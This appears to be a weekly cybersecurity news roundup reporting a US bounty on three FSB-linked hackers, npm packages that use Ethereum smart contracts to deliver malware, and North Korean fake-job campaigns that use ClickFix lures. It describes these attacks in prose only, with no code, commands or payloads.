The Good, the Bad and the Ugly in Cybersecurity – Week 36

The Good | U.S. Puts $10m bounty on Heads of Three Russian FSB Threat Actors

The U.S. Department of State has announced a bounty of up to $10 million for information on three Russian Federal Security Service (FSB) officers accused of orchestrating cyberattacks against U.S. critical infrastructure. The officers, Marat Valeryevich Tyukov, Mikhail Mikhailovich Gavrilov, and Pavel Aleksandrovich Akulov, are thought to be linked to FSB's Center 16 (aka Military Unit 71330).

The same trio was also charged in March 2022 for a long-running campaign (2012-2017) that targeted U.S. government agencies, including the Nuclear Regulatory Commission and various energy firms. One such firm, Wolf Creek Nuclear Operating Corporation, operates a nuclear power plant based in Burlington, Kansas. According to the State Department, Tyukov, Gavrilov, and Akulov's operations extended to over 500 foreign energy companies in 135 other countries.

Just a few weeks ago, the FBI warned that the same actors had been exploiting CVE-2018-0171 in outdated Cisco networking devices over the past year. The vulnerability allows attackers to remotely execute code on unpatched systems, allowing them to breach multiple companies across U.S. critical infrastructure sectors. The networking firm has since released a patch for the flaw and urged network admins to update their devices.

The FSB-linked group has a long history of targeting U.S. state, local, tribal, and aviation entities. Tips can be submitted anonymously via the department's Tor-based Rewards for Justice channel, with the possibility of relocation for informants.

The Bad | Ethereum Smart Contracts Drive New NPM Malware Delivery Campaign

Two newly uncovered malicious npm packages are using Ethereum smart contracts to conceal and deliver malware, highlighting evolving attacker tactics in software supply chain attacks. The packages, colortoolsv2 and mimelib2, were uploaded in July 2025 and later removed.

According to security researchers, the packages trigger code that fetches a second-stage payload from attacker-controlled servers once they are imported into a project. While the packages can be easily exposed for their malicious functionality, GitHub projects that imported them make them appear credible to unsuspecting users. What sets this operation apart is its use of Ethereum smart contracts to host the URLs for payload delivery, a method reminiscent of the EtherHiding technique. By leveraging decentralized blockchain infrastructure, attackers can better obscure their command and control (C2) mechanisms and avoid takedowns.

Further investigation has linked the npm packages to a wider campaign involving bogus GitHub repositories disguised as cryptocurrency trading tools, including solana-trading-bot-v2, ethereum-mev-bot-v2, and hyperliquid-trading-bot. These repositories all falsely advertised automated trading capabilities, targeting developers and crypto enthusiasts. The accounts tied to this activity were connected to a distribution-as-a-service (DaaS) cluster dubbed 'Stargazers Ghost Network', known for manipulating repository popularity through fake stars, forks, and commits.

These incidents point to a broader trend: crypto-related supply chain attacks are accelerating and growing more sophisticated. As threat actors weaponize blockchain technology to distribute malware, developers are being urged to go beyond surface metrics when evaluating libraries and to rigorously vet both open-source and third-party code for signs of tampering. Proactive scrutiny, including reviewing not just downloads and commit history but also the credibility of maintainers, remains the first line of defense against malware hidden in trusted repositories.

The Ugly | DPRK Threat Actors Leverage Cyber Threat Intel Tools to Manage Campaigns

SentinelLABS and Validin have revealed that North Korea-aligned threat actors behind the Contagious Interview campaign cluster actively monitor cyber threat intelligence (CTI) platforms to track exposure of their infrastructure and scout new assets. The actors operate in coordinated teams, communicating via common enterprise tools like Slack, while drawing on sources such as Validin, VirusTotal, and Maltrail to inform their operations.

Although they recognize their infrastructure is detectable, these actors make only limited modifications to conceal it. Instead, they focus on rapidly deploying new assets following service provider takedowns, maintaining high victim engagement over preserving older infrastructure. This approach reflects both resource constraints and internal incentives, as decentralized teams compete to protect individual assets rather than coordinate large-scale security updates.

Between January to March 2025, SentinelLABS identified more than 230 victims, most of them cryptocurrency professionals, though the actual number is likely higher. Targets are lured through fake job offers using the ClickFix social engineering technique, which manipulates candidates into running malicious commands under the guise of assessments or troubleshooting errors.

Accompanying reporting by Reuters highlights how these scams have become common in the crypto industry. Interviews with victims, including developers, consultants, and executives, confirmed the sophistication of the fraudulent offers as well as financial losses suffered. The reporting humanizes the impact and the breadth of the campaign, showing how Pyongyang-backed actors exploit trust and professional networks to steal digital assets.

Effective mitigation requires vigilance from job seekers, especially those in the cryptocurrency sector, alongside proactive disruption of malicious infrastructure by service providers. Close collaboration, intelligence-sharing, and media exposure are also essential in reducing the reach and impact of these campaigns.